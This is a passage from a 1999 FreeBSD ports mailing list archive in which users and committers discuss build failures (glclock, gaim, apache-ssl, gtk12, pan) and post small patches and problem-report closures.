GLObject .cpp c++ -O -pipe -w -DGLCLOCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -O -pipe -w -DGLCL OCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -fexpensive-optimizations -ffast-math - fomit-frame-pointer -fforce-mem -fforce-addr -c -I/usr/X11R6/include -c PNMIO.cp p c++ -O -pipe -w -DGLCLOCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -O -pipe -w -DGLCL OCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -fexpensive-optimizations -ffast-math - fomit-frame-pointer -fforce-mem -fforce-addr -c -I/usr/X11R6/include -c MString. cpp c++ -O -pipe -w -DGLCLOCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -fexpensive-optim izations -ffast-math -fomit-frame-pointer -fforce-mem -fforce-addr -L/usr/X11R6 /lib -Wl,-rpath,/usr/X11R6/lib -o glclock glclock.o GLObject.o PNMIO.o MString.o -lglut -lGLU -lGL -lXext -lXmu -lX11 -lm /usr/X11R6/lib/libglut.so: undefined reference to `XGetExtensionVersion' /usr/X11R6/lib/libglut.so: undefined reference to `XFreeDeviceList' /usr/X11R6/lib/libglut.so: undefined reference to `XQueryDeviceState' /usr/X11R6/lib/libglut.so: undefined reference to `XListInputDevices' /usr/X11R6/lib/libglut.so: undefined reference to `XFreeDeviceState' /usr/X11R6/lib/libglut.so: undefined reference to `XOpenDevice' /usr/X11R6/lib/libglut.so: undefined reference to `XSelectExtensionEvent' *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. marder-1# -- PERL has been described as "the duct tape of the Internet" and "the Unix Swiss Army chainsaw" - Computer Shopper 12/99 ________________________________________________________________ FreeBSD - The Power To Serve http://www.freebsd.org My Webpage http://ukug.uk.freebsd.org/~mark/ mailto:mark@ukug.uk.freebsd.org http://www.radan.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 13:53:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from kci.kciLink.com (kci.kciLink.com [204.117.82.1]) by hub.freebsd.org (Postfix) with ESMTP id CE3CF1512B for ; Tue, 14 Dec 1999 13:53:19 -0800 (PST) (envelope-from khera@kciLink.com) Received: from onceler.kcilink.com (onceler.kciLink.com [204.117.82.2]) by kci.kciLink.com (Postfix) with ESMTP id DEB96E8B0; Tue, 14 Dec 1999 16:53:14 -0500 (EST) Received: (from khera@localhost) by onceler.kcilink.com (8.9.3/8.9.3) id QAA64678; Tue, 14 Dec 1999 16:53:14 -0500 (EST) (envelope-from khera@kci.kcilink.com) From: Vivek Khera MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14422.48202.807583.537595@onceler.kcilink.com> Date: Tue, 14 Dec 1999 16:53:14 -0500 (EST) To: freebsd-ports@freebsd.org, jimduchek@ou.edu Subject: patch to gaim 0.9.10 port for FreeBSD 3.4-RC X-Mailer: VM 6.72 under 21.1 (patch 8) "Bryce Canyon" XEmacs Lucid Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The port of gaim 0.9.10 to FreeBSD-stable from cvsup earlier today crashes with a SIGFPE error a few seconds after startup. I traced it down to a call to log(x) where x=0. The following patch corrects this problem: *** #buddy.c~ Tue Dec 14 16:42:14 1999 --- src/buddy.c Tue Dec 14 16:42:14 1999 *************** *** 202,208 **** pct = last_lag_us/100000; ! pct = 25 * log(pct); if (pct < 0) pct = 0; --- 202,208 ---- pct = last_lag_us/100000; ! pct = 25 * log(pct+1.0); if (pct < 0) pct = 0; Curiously, this problem did not affect Linux nor BSD/OS 4.0.1, only FreeBSD-stable. Thanks! -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Vivek Khera, Ph.D. Khera Communications, Inc. Internet: khera@kciLink.com Rockville, MD +1-301-545-6996 PGP & MIME spoken here http://www.kciLink.com/home/khera/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 15:19:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 785A914C04; Tue, 14 Dec 1999 15:19:30 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA23494; Tue, 14 Dec 1999 15:19:30 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Tue, 14 Dec 1999 15:19:30 -0800 (PST) From: Message-Id: <199912142319.PAA23494@freefall.freebsd.org> To: dwhite@freebsd.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15476: ssh 1.2.27 port BROKEN: patch-ac does not apply Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ssh 1.2.27 port BROKEN: patch-ac does not apply State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Tue Dec 14 15:19:02 PST 1999 State-Changed-Why: Asami recently fixed this up To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 15:21:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from norn.ca.eu.org (cr965240-b.abtsfd1.bc.wave.home.com [24.113.19.137]) by hub.freebsd.org (Postfix) with ESMTP id 5C6281530C for ; Tue, 14 Dec 1999 15:21:08 -0800 (PST) (envelope-from cpiazza@norn.ca.eu.org) Received: by norn.ca.eu.org (Postfix, from userid 1000) id 185A911F; Tue, 14 Dec 1999 15:21:04 -0800 (PST) Date: Tue, 14 Dec 1999 15:21:04 -0800 From: Chris Piazza To: Steve Price Cc: Pascal Hofstee , freebsd-ports@FreeBSD.ORG Subject: Re: configure problems Message-ID: <19991214152104.B722@norn.ca.eu.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from sprice@hiwaay.net on Tue, Dec 14, 1999 at 11:41:22AM -0600 X-Operating-System: FreeBSD 4.0-CURRENT i386 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 14, 1999 at 11:41:22AM -0600, Steve Price wrote: > On Tue, 14 Dec 1999, Pascal Hofstee wrote: > > # I have noticed some weird problems lately when running configure-scripts. > # E.g. when trying to build the gtk12-port configure just hangs waiting for > # "conftest" to finish (which never seems to do so). I have noticed > # similair problems with other configure checks (e.g. SDL). > # > # Is this a known issue and/or is there any way to solve this problem ? > > I am seeing similar problems here. Try removing '-pipe' from > your CFLAGS in /etc/make.conf and see if you still get the > same results. See PR bin/15328. -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 15:36:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from norn.ca.eu.org (cr965240-b.abtsfd1.bc.wave.home.com [24.113.19.137]) by hub.freebsd.org (Postfix) with ESMTP id 545AB152E5 for ; Tue, 14 Dec 1999 15:36:43 -0800 (PST) (envelope-from cpiazza@norn.ca.eu.org) Received: by norn.ca.eu.org (Postfix, from userid 1000) id 66E8523A; Tue, 14 Dec 1999 15:36:39 -0800 (PST) Date: Tue, 14 Dec 1999 15:36:39 -0800 From: Chris Piazza To: Mark Ovens Cc: ports@FreeBSD.ORG Subject: Re: glclock port broken? Message-ID: <19991214153639.C722@norn.ca.eu.org> References: <19991214213635.D339@marder-1> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <19991214213635.D339@marder-1>; from mark@dogma.freebsd-uk.eu.org on Tue, Dec 14, 1999 at 09:36:35PM +0000 X-Operating-System: FreeBSD 4.0-CURRENT i386 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 14, 1999 at 09:36:35PM +0000, Mark Ovens wrote: > Just tried to build glclock from the ports (ports tree cvsup'd 10 > minutes ago) and it fails at the link stage. Can anyone tell me what's > wrong? > > 3.3-STABLE (as of the end of Sept.) and XFree 3.3.5. > Here's a patch to fix it. I'll commit this after the freeze. Index: glclock/patches/patch-aa =================================================================== RCS file: /home/ncvs/ports/x11-clocks/glclock/patches/patch-aa,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 patch-aa --- glclock/patches/patch-aa 1999/09/25 22:29:13 1.1.1.1 +++ glclock/patches/patch-aa 1999/12/14 23:35:48 @@ -1,5 +1,5 @@ --- makefile.orig Sat Jun 12 08:37:05 1999 -+++ makefile Sat Sep 25 15:23:49 1999 ++++ makefile Tue Dec 14 15:34:07 1999 @@ -3,22 +3,27 @@ # June 1998 by Masaki Kawase (g93088@isc.chubu.ac.jp) # @@ -16,12 +16,13 @@ - LIB_PATH = -L/usr/local/X11R6/lib + GLCLOCK_DIR = ${PREFIX}/lib/X11/glclock/ +- LIBS = -lglut -lGLU -lGL -lXext -lXmu -lX11 -lm + INCLUDE_PATH = -I${X11BASE}/include + LIB_PATH = -L${X11BASE}/lib -Wl,-rpath,/usr/X11R6/lib + +# Link with -lGL on FreeBSD so we use hardware-accelerated GL, when installed. +# (see http://www.freebsd.org/~3d) - LIBS = -lglut -lGLU -lGL -lXext -lXmu -lX11 -lm ++ LIBS = -lglut -lGLU -lGL -lXext -lXmu -lX11 -lm -lXi # for Mesa # LIBS = -lglut -lMesatk -lMesaGLU -lMesaGL -lXi -lXext -lXmu -lX11 -lm -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 18: 3:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 692F914F85; Tue, 14 Dec 1999 18:03:22 -0800 (PST) (envelope-from asami@FreeBSD.org) Received: (from asami@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA39804; Tue, 14 Dec 1999 18:03:20 -0800 (PST) (envelope-from asami@FreeBSD.org) Date: Tue, 14 Dec 1999 18:03:20 -0800 (PST) From: Message-Id: <199912150203.SAA39804@freefall.freebsd.org> To: alex@big.endian.de, asami@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15406: audio/gogo does not build with nasm < 0.98 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: audio/gogo does not build with nasm < 0.98 State-Changed-From-To: open->closed State-Changed-By: asami State-Changed-When: Tue Dec 14 18:02:03 PST 1999 State-Changed-Why: I committed a similar change, without the part about actually renaming the nasm binary. I think it's good enough, please let me know if you disagree. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 18:22:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from celery.dragondata.com (celery.dragondata.com [205.253.12.6]) by hub.freebsd.org (Postfix) with ESMTP id C6DE21531B for ; Tue, 14 Dec 1999 18:22:18 -0800 (PST) (envelope-from toasty@celery.dragondata.com) Received: (from toasty@localhost) by celery.dragondata.com (8.9.3/8.9.3) id UAA88956 for ports@freebsd.org; Tue, 14 Dec 1999 20:25:03 -0600 (CST) (envelope-from toasty) From: Kevin Day Message-Id: <199912150225.UAA88956@celery.dragondata.com> Subject: Apache-SSL broken? To: ports@freebsd.org Date: Tue, 14 Dec 1999 20:25:03 -0600 (CST) X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm trying to build apache13-ssl, and not having much luck: ===> Configuring for apache+ssl-1.3.9+1.37 Configuring for Apache, Version 1.3.9 Ben-SSL/1.37 1.3.9 + using installation path layout: GNU (config.layout) Creating Makefile Creating Configuration.apaci in src + enabling mod_so for DSO support Creating Makefile in src + configured for FreeBSD 3.2 platform + setting C pre-processor to cc -E + checking for system header files + using custom target name: httpsd + adding selected modules o rewrite_module uses ConfigStart/End enabling DBM support for mod_rewrite o db_auth_module uses ConfigStart/End using Berkeley-DB/1.x for mod_auth_db (-lc) + checking sizeof various data types + doing sanity check on compiler and options ** A test compilation with your Makefile configuration ** failed. This is most likely because your C compiler ** is not ANSI. Apache requires an ANSI C Compiler, such ** as gcc. The above error message from your compiler ** will also provide a clue. Aborting! ===> Building for apache+ssl-1.3.9+1.37 ===> src make: don't know how to make all. Stop Any idea what i've done wrong? I've got the latest ports, and am using 3.2-STABLE, with the ports upgrade kit. Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 18:50: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3DD9D14E23 for ; Tue, 14 Dec 1999 18:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA43200; Tue, 14 Dec 1999 18:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 18:50:02 -0800 (PST) Message-Id: <199912150250.SAA43200@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Chris D. Faulhaber" Subject: Re: ports/15482: Update port: news/pan Reply-To: "Chris D. Faulhaber" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15482; it has been noted by GNATS. From: "Chris D. Faulhaber" To: FreeBSD-gnats-submit@freebsd.org Cc: Subject: Re: ports/15482: Update port: news/pan Date: Tue, 14 Dec 1999 21:45:58 -0500 (EST) Ok...they put 0.6.7 out also today. Here is the diff, please ignore the previous one. diff -urN pan.old/Makefile pan/Makefile --- pan.old/Makefile Sat Dec 4 18:32:51 1999 +++ pan/Makefile Tue Dec 14 21:25:06 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: pan -# Version required: 0.6.5 +# Version required: 0.6.7 # Date created: 07 August 1999 # Whom: Chris D. Faulhaber # # $FreeBSD: ports/news/pan/Makefile,v 1.10 1999/12/04 23:32:51 cpiazza Exp $ # -DISTNAME= pan-0.6.5 +DISTNAME= pan-0.6.7 CATEGORIES= news gnome MASTER_SITES= ftp://source.rebelbase.com/pub/pan/ diff -urN pan.old/files/md5 pan/files/md5 --- pan.old/files/md5 Fri Dec 10 12:21:15 1999 +++ pan/files/md5 Tue Dec 14 21:27:52 1999 @@ -1 +1 @@ -MD5 (pan-0.6.5.tar.bz2) = 2c238b03b0d25d031c52191cde42ac9f +MD5 (pan-0.6.7.tar.bz2) = f4c404f25614a7e3a24fcc4a997abe91 diff -urN pan.old/patches/patch-ad pan/patches/patch-ad --- pan.old/patches/patch-ad Wed Dec 31 19:00:00 1969 +++ pan/patches/patch-ad Tue Dec 14 21:32:57 1999 @@ -0,0 +1,13 @@ +--- pan/gui.h.orig Sun Dec 12 01:06:10 1999 ++++ pan/gui.h Mon Dec 13 17:04:30 1999 +@@ -21,6 +21,10 @@ + #ifndef __GUI_H__ + #define __GUI_H__ + ++#if defined(__FreeBSD__) ++typedef u_long ulong; ++#endif ++ + extern GtkWidget *appbar; + + extern GtkWidget *infobar; diff -urN pan.old/patches/patch-ae pan/patches/patch-ae --- pan.old/patches/patch-ae Wed Dec 31 19:00:00 1969 +++ pan/patches/patch-ae Tue Dec 14 21:30:24 1999 @@ -0,0 +1,11 @@ +--- uulib/Makefile.in.orig Mon Dec 13 14:09:45 1999 ++++ uulib/Makefile.in Mon Dec 13 17:08:46 1999 +@@ -115,7 +115,7 @@ + libuu_a_LIBADD = uulib.o uucheck.o uunconc.o uuutil.o uuencode.o uuscan.o uustring.o fptools.o + + +-CFLAGS = -O2 ++CFLAGS = @CFLAGS@ + mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs + CONFIG_HEADER = ../config.h + CONFIG_CLEAN_FILES = diff -urN pan.old/patches/patch-af pan/patches/patch-af --- pan.old/patches/patch-af Wed Dec 31 19:00:00 1969 +++ pan/patches/patch-af Tue Dec 14 21:30:24 1999 @@ -0,0 +1,11 @@ +--- rx/Makefile.in.orig Mon Dec 13 14:09:45 1999 ++++ rx/Makefile.in Mon Dec 13 17:19:26 1999 +@@ -115,7 +115,7 @@ + noinst_HEADERS = _rx.h rx.h rxanal.h rxbasic.h rxbitset.h rxcontext.h rxcset.h rxgnucomp.h rxhash.h rxnfa.h rxnode.h inst-rxposix.h rxposix.h rxproto.h rxsimp.h rxspencer.h rxstr.h rxsuper.h rxunfa.h rxall.h + + +-CFLAGS = -O2 ++CFLAGS = @CFLAGS@ + mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs + CONFIG_HEADER = ../config.h + CONFIG_CLEAN_FILES = To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 18:54:34 1999 Delivered-To: freebsd-ports@freebsd.org Received: from thelab.hub.org (nat196.191.mpoweredpc.net [142.177.196.191]) by hub.freebsd.org (Postfix) with ESMTP id 3587C14C01 for ; Tue, 14 Dec 1999 18:54:31 -0800 (PST) (envelope-from scrappy@hub.org) Received: from localhost (scrappy@localhost) by thelab.hub.org (8.9.3/8.9.1) with ESMTP id WAA84459 for ; Tue, 14 Dec 1999 22:54:48 -0400 (AST) (envelope-from scrappy@hub.org) X-Authentication-Warning: thelab.hub.org: scrappy owned process doing -bs Date: Tue, 14 Dec 1999 22:54:43 -0400 (AST) From: The Hermit Hacker To: freebsd-ports@freebsd.org Subject: gtk12 hangs on configure? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org running 4.0-CURRENT of Dec12th, and ports cvsup'd as of an hour or so ago, trying to compile gtk12, it hangs at: checking for extra flags for POSIX compliance... none needed checking for glib-config... /usr/local/bin/glib12-config checking for GLIB - version >= 1.2.4... config.log shows: configure:4286: checking for GLIB - version >= 1.2.4 configure:4385: cc -o conftest -O3 -mpentium -pipe -Wall -I/usr/local/include/glib12 -D_THREAD_SAFE -I/usr/local/include conftest.c -L/usr/local/lib -Wl,-E -lgmodule12 -lgthread12 -lglib12 -pthread -L/usr/local/lib -lintl -lxpg4 1>&5 I've tried reinstalling glib 1.2.6, no change, just hangs... I've looked at top, and it doesn't even look like cc is doing anything... And I've looked in /var/log/messages, and nothing there... Thoughts? Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy Systems Administrator @ hub.org primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 19: 5:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from Genesis.Denninger.Net (209-176-244-82.inil.com [209.176.244.82]) by hub.freebsd.org (Postfix) with ESMTP id 638F314C01 for ; Tue, 14 Dec 1999 19:05:52 -0800 (PST) (envelope-from karl@Genesis.Denninger.Net) Received: (from karl@localhost) by Genesis.Denninger.Net (8.9.3/8.8.2) id VAA22095 for ports@freebsd.org; Tue, 14 Dec 1999 21:05:49 -0600 (CST) Message-ID: <19991214210549.A22088@Denninger.Net> Date: Tue, 14 Dec 1999 21:05:49 -0600 From: Karl Denninger To: ports@freebsd.org Subject: Reply to Kevin Day Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i Organization: Karl's Sushi and Packet Smashers X-Die-Spammers: Spammers cheerfully broiled for supper and served with ketchup! Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kevin, The Apache+SSL problem you are having devolves down into: Genesis:${PWD##}> cd ..; gcc -funsigned-char -DTARGET=\"httpsd\" -DUSE_EXPAT -I./lib/expat-lite -DAPACHE_SSL helpers/dummy.c -o helpers/dummy -lcrypt -L/usr/local/lib -lcrypto -lssl /usr/local/lib/libcrypto.so: undefined reference to `ERR_load_RSAREF_strings' /usr/local/lib/libcrypto.so: undefined reference to `RSA_PKCS1_RSAref' The Configure program is running a "test compile" which attempts to link using the crypto and ssl libraries. THESE LIBRARIES ARE MISSING TWO EXTERNAL REFERENCES, which is why its blowing up. This is one of the *DEPENDANCIES* for the Apache program - it sound like something has gotten out of sync between Openssl and the Apache version involved. -- -- Karl Denninger (karl@denninger.net) Web: http://childrens-justice.org Isn't it time we started putting KIDS first? See the above URL for a plan to do exactly that! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 19:42:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from wint.itfs.nsk.su (wint.itfs.nsk.su [212.20.32.43]) by hub.freebsd.org (Postfix) with ESMTP id E834914D60 for ; Tue, 14 Dec 1999 19:42:44 -0800 (PST) (envelope-from nnd@wint.itfs.nsk.su) Received: (from nnd@localhost) by wint.itfs.nsk.su (8.9.3/8.9.3) id JAA20716; Wed, 15 Dec 1999 09:42:28 +0600 (NOVT) (envelope-from nnd) Date: Wed, 15 Dec 1999 09:42:28 +0600 (NOVT) Message-Id: <199912150342.JAA20716@wint.itfs.nsk.su> From: nnd@mail.nsk.ru To: The Hermit Hacker Cc: ports@freebsd.org, eischen@vigrid.com Subject: Re: gtk12 hangs on configure? X-Newsgroups: itfs.freebsd.ports In-Reply-To: User-Agent: tin/1.4.1-19991201 ("Polish") (UNIX) (FreeBSD/4.0-CURRENT (i386)) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In The Hermit Hacker wrote: > > running 4.0-CURRENT of Dec12th, and ports cvsup'd as of an hour or so ago, > trying to compile gtk12, it hangs at: > > checking for extra flags for POSIX compliance... none needed > checking for glib-config... /usr/local/bin/glib12-config > checking for GLIB - version >= 1.2.4... See PR 'bin/15328'. Daniel Eischen send me the patch which solved this problem, but it is not commited yet. N.Dudorov To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 20:10:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from thelab.hub.org (nat196.191.mpoweredpc.net [142.177.196.191]) by hub.freebsd.org (Postfix) with ESMTP id AADDE153A6 for ; Tue, 14 Dec 1999 20:10:36 -0800 (PST) (envelope-from scrappy@hub.org) Received: from localhost (scrappy@localhost) by thelab.hub.org (8.9.3/8.9.1) with ESMTP id AAA06133; Wed, 15 Dec 1999 00:10:22 -0400 (AST) (envelope-from scrappy@hub.org) X-Authentication-Warning: thelab.hub.org: scrappy owned process doing -bs Date: Wed, 15 Dec 1999 00:10:21 -0400 (AST) From: The Hermit Hacker To: nnd@mail.nsk.ru Cc: ports@freebsd.org, eischen@vigrid.com Subject: Re: gtk12 hangs on configure? In-Reply-To: <199912150342.JAA20716@wint.itfs.nsk.su> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org great, thanks, hand applied it now and am trying it out... On Wed, 15 Dec 1999 nnd@mail.nsk.ru wrote: > In The Hermit Hacker wrote: > > > > running 4.0-CURRENT of Dec12th, and ports cvsup'd as of an hour or so ago, > > trying to compile gtk12, it hangs at: > > > > checking for extra flags for POSIX compliance... none needed > > checking for glib-config... /usr/local/bin/glib12-config > > checking for GLIB - version >= 1.2.4... > > See PR 'bin/15328'. > > Daniel Eischen send me the patch which solved this > problem, but it is not commited yet. > > N.Dudorov > Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy Systems Administrator @ hub.org primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 20:28:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cx587235-a.chnd1.az.home.com (cx587235-a.chnd1.az.home.com [24.11.88.170]) by hub.freebsd.org (Postfix) with ESMTP id A30E01539E for ; Tue, 14 Dec 1999 20:28:51 -0800 (PST) (envelope-from jjreynold@home.com) Received: from whale.home-net (whale [192.168.1.2]) by cx587235-a.chnd1.az.home.com (8.9.3/8.9.3) with ESMTP id VAA16189 for ; Tue, 14 Dec 1999 21:28:50 -0700 (MST) (envelope-from jjreynold@home.com) Received: (from jjreynold@localhost) by whale.home-net (8.9.3/8.9.3) id VAA05512; Tue, 14 Dec 1999 21:29:15 -0700 (MST) (envelope-from jjreynold@home.com) From: John and Jennifer Reynolds MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14423.6426.473062.353645@whale.home-net> Date: Tue, 14 Dec 1999 21:29:14 -0700 (MST) To: freebsd-ports@freebsd.org Subject: Re: ports/15433 X-Mailer: VM 6.73 under Emacs 20.4.1 Cc: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Would it be possible for one of you kind committers to apply the patch seen in: http://www.freebsd.org/cgi/query-pr.cgi?pr=15433 Is it too late to get this in under the wire for 3.4 (I haven't seen "freeze" messages go by yet ... maybe I just missed them). Thank you in advance! -Jr -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= John Reynolds Chandler Capabilities Engineering, CDS, Intel Corporation jreynold@sedona.ch.intel.com My opinions are mine, not Intel's. Running jjreynold@home.com FreeBSD 3.4-RC. FreeBSD: The Power to Serve. http://members.home.com/jjreynold/ Come join us!!! @ http://www.FreeBSD.org/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 20:37:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pcnet1.pcnet.com (pcnet1.pcnet.com [204.213.232.3]) by hub.freebsd.org (Postfix) with ESMTP id 6BF0415396 for ; Tue, 14 Dec 1999 20:37:57 -0800 (PST) (envelope-from eischen@vigrid.com) Received: from vigrid.com (pm3-pt62.pcnet.net [206.105.29.136]) by pcnet1.pcnet.com (8.8.7/PCNet) with ESMTP id XAA15874; Tue, 14 Dec 1999 23:37:50 -0500 (EST) Message-ID: <38571ABB.D7ACAFA0@vigrid.com> Date: Tue, 14 Dec 1999 23:36:11 -0500 From: "Daniel M. Eischen" X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 4.0-CURRENT i386) X-Accept-Language: en MIME-Version: 1.0 To: nnd@mail.nsk.ru, scrappy@hub.org Cc: ports@freebsd.org Subject: Re: gtk12 hangs on configure? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > great, thanks, hand applied it now and am trying it out... > > On Wed, 15 Dec 1999 nnd@mail.nsk.ru wrote: > > > In The Hermit Hacker wrote: > > > > > > running 4.0-CURRENT of Dec12th, and ports cvsup'd as of an hour or so ago, > > > trying to compile gtk12, it hangs at: > > > > > > checking for extra flags for POSIX compliance... none needed > > > checking for glib-config... /usr/local/bin/glib12-config > > > checking for GLIB - version >= 1.2.4... > > > > See PR 'bin/15328'. > > > > Daniel Eischen send me the patch which solved this > > problem, but it is not commited yet. > > > > N.Dudorov > > The patch in the PR is not the correct patch. The most recent patches are at: http://www.freebsd.org/~deischen/libc_r.diffs They're currently being reviewed before committing. Dan Eischen eischen@vigrid.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 2:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 37D2D14CF4; Tue, 14 Dec 1999 21:02:46 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA55364; Tue, 14 Dec 1999 21:02:46 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:02:46 -0800 (PST) From: Message-Id: <199912150502.VAA55364@freefall.freebsd.org> To: mitsuru@zebu.riken.go.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15081: upgrade port japanese/texinfo Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: upgrade port japanese/texinfo State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Tue Dec 14 21:02:21 PST 1999 State-Changed-Why: Upgrade already committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21: 3:51 1999 Delivered-To: 